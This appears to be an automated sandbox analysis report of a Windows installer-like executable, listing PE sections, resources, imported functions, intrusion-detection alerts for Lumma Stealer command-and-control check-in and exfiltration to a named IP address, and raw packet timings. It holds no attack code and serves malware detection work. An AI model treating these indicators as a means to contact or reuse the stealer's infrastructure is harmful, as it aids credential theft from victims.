                                                                                                                        .text0x10000x2c20c80x2c22000484a41ef5ad9dba276e3b4d7aab4d55unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .itext0x2c40000x28980x2a0014817d9596460398ce8a10ec41885658False0.5013950892857143data6.097600196485659IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x2c70000x92580x9400b6c68a9cc08d787f829bebe13beeebceFalse0.576198268581081data6.2228077637398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .bss0x2d10000x790c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .idata0x2d90000x39ba0x3a001c7fac207b7708f2d38f3eced48727dcFalse0.3355334051724138data5.289106478125697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .didata0x2dd0000xbde0xc00022cbd8e7ebbfb3df44dfd43f92fa718False0.3512369791666667data4.391276161587863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .edata0x2de0000x970x20029372b5d9fa8b5b431a37756aee4c5b7False0.25data1.8458344781090077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .tls0x2df0000x4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rdata0x2e00000x5d0x2000e147eb88402eb8a56f168b457309291False0.189453125data1.3507743158343073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x2e10000x70a000x70a00661724ecf8956e450a5bd373b2e06432False0.5411890434239733data6.957816337132757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_CURSOR0x2e1be00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                        RT_CURSOR0x2e1d140x134dataEnglishUnited States0.4642857142857143
                                                                                                                        RT_CURSOR0x2e1e480x134dataEnglishUnited States0.4805194805194805
                                                                                                                        RT_CURSOR0x2e1f7c0x134dataEnglishUnited States0.38311688311688313
                                                                                                                        RT_CURSOR0x2e20b00x134dataEnglishUnited States0.36038961038961037
                                                                                                                        RT_CURSOR0x2e21e40x134dataEnglishUnited States0.4090909090909091
                                                                                                                        RT_CURSOR0x2e23180x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                        RT_ICON0x2e244c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 30236 x 30236 px/mEnglishUnited States0.09360582041878623
                                                                                                                        RT_STRING0x2f2c740x210data0.3125
                                                                                                                        RT_STRING0x2f2e840x440data0.37683823529411764
                                                                                                                        RT_STRING0x2f32c40x2b4data0.45809248554913296
                                                                                                                        RT_STRING0x2f35780x214data0.4605263157894737
                                                                                                                        RT_STRING0x2f378c0x3e4data0.3885542168674699
                                                                                                                        RT_STRING0x2f3b700x3a0data0.4191810344827586
                                                                                                                        RT_STRING0x2f3f100x1ecdata0.5609756097560976
                                                                                                                        RT_STRING0x2f40fc0xccdata0.6666666666666666
                                                                                                                        RT_STRING0x2f41c80x294data0.4681818181818182
                                                                                                                        RT_STRING0x2f445c0x3e8data0.372
                                                                                                                        RT_STRING0x2f48440x488data0.41293103448275864
                                                                                                                        RT_STRING0x2f4ccc0x418data0.28435114503816794
                                                                                                                        RT_STRING0x2f50e40x370data0.4147727272727273
                                                                                                                        RT_STRING0x2f54540x39cdata0.41233766233766234
                                                                                                                        RT_STRING0x2f57f00x4a4data0.382996632996633
                                                                                                                        RT_STRING0x2f5c940x384data0.37333333333333335
                                                                                                                        RT_STRING0x2f60180x454data0.3935018050541516
                                                                                                                        RT_STRING0x2f646c0x210data0.39015151515151514
                                                                                                                        RT_STRING0x2f667c0xbcdata0.6542553191489362
                                                                                                                        RT_STRING0x2f67380x100data0.62890625
                                                                                                                        RT_STRING0x2f68380x338data0.4223300970873786
                                                                                                                        RT_STRING0x2f6b700x3f0data0.34226190476190477
                                                                                                                        RT_STRING0x2f6f600x314data0.38578680203045684
                                                                                                                        RT_STRING0x2f72740x2f8data0.38026315789473686
                                                                                                                        RT_RCDATA0x2f756c0x10data1.5
                                                                                                                        RT_RCDATA0x2f757c0x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                        RT_RCDATA0x2f8d7c0xb70data0.5358606557377049
                                                                                                                        RT_RCDATA0x2f98ec0x147Delphi compiled form 'TMainForm'0.746177370030581
                                                                                                                        RT_RCDATA0x2f9a340x480Delphi compiled form 'TNewDiskForm'0.5052083333333334
                                                                                                                        RT_RCDATA0x2f9eb40x400Delphi compiled form 'TSelectFolderForm'0.5087890625
                                                                                                                        RT_RCDATA0x2fa2b40x4b5Delphi compiled form 'TSelectLanguageForm'0.5004149377593361
                                                                                                                        RT_RCDATA0x2fa76c0x7e3Delphi compiled form 'TUninstallProgressForm'0.40713224368499257
                                                                                                                        RT_RCDATA0x2faf500x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
                                                                                                                        RT_RCDATA0x2fb4ac0x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                                        RT_GROUP_CURSOR0x2fdf780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                        RT_GROUP_CURSOR0x2fdf8c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                        RT_GROUP_CURSOR0x2fdfa00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0x2fdfb40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0x2fdfc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0x2fdfdc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_CURSOR0x2fdff00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                        RT_GROUP_ICON0x2fe0040x14dataEnglishUnited States1.15
                                                                                                                        RT_VERSION0x2fe0180x514dataEnglishUnited States0.28846153846153844
                                                                                                                        RT_MANIFEST0x2fe52c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3836734693877551
                                                                                                                        DLLImport
                                                                                                                        mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                                                        comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                        comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                                                        shell32.dllSHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                                                        user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
                                                                                                                        version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                        oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                                                        advapi32.dllRegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
                                                                                                                        netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                        msvcrt.dllmemcpy
                                                                                                                        winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                                                                                        kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                                        ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                                                                                                                        gdi32.dllArc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries
                                                                                                                        NameOrdinalAddress
                                                                                                                        TMethodImplementationIntercept30x4b5e78
                                                                                                                        __dbk_fcall_wrapper20x410a7c
                                                                                                                        dbkFCallWrapperAddr10x6d4640
                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-12-24T02:59:11.705797+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:12.138300+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:12.138300+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:13.384040+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:14.151154+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:14.151154+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:15.763280+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:18.097450+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:18.931023+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449736172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:20.402504+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:22.990797+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:25.708628+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:29.504298+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.177.88443TCP
                                                                                                                        2024-12-24T02:59:30.269322+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744172.67.177.88443TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Dec 24, 2024 02:59:10.483886957 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:10.483962059 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:10.484070063 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:10.487009048 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:10.487021923 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:11.705600023 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:11.705796957 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:11.709002972 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:11.709011078 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:11.709364891 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:11.752057076 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:11.755820036 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:11.755853891 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:11.755888939 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.138324022 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.138771057 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.138820887 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.138875961 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.138932943 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.138967991 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.138988018 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.138994932 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.139038086 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.140412092 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.140434980 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.140455008 CET49731443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.140461922 CET44349731172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.168549061 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.168597937 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:12.168690920 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.168940067 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:12.168953896 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:13.383644104 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:13.384040117 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:13.386451960 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:13.386477947 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:13.386811018 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:13.388039112 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:13.388039112 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:13.388127089 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.151160002 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.151768923 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.151809931 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.151844978 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.151896954 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.151959896 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.152343035 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.161142111 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.161209106 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.161226034 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.169441938 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.169513941 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.169537067 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.220705986 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.220741034 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.267590046 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.270721912 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.274877071 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.274931908 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.274945974 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.314481974 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.343090057 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.346970081 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.347026110 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.347040892 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.347074032 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.347135067 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.347219944 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.347264051 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.347296953 CET49732443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.347331047 CET44349732172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.550194979 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.550275087 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:14.550373077 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.550750017 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:14.550797939 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:15.763185978 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:15.763279915 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:15.764379978 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:15.764411926 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:15.764638901 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:15.765897989 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:15.766069889 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:15.766109943 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:15.766181946 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:15.766197920 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:16.726933002 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:16.727006912 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:16.727200985 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:16.727278948 CET49734443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:16.727334976 CET44349734172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:16.864381075 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:16.864475965 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:16.864554882 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:16.865288973 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:16.865324974 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:18.097366095 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:18.097450018 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:18.098556995 CET49736443192.168.2.4172.67.177.88
                                                                                                                        Dec 24, 2024 02:59:18.098587036 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:18.098809004 CET44349736172.67.177.88192.168.2.4
                                                                                                                        Dec 24, 2024 02:59:18.099936962 CET49736443192.168.2.4172.67.177.88
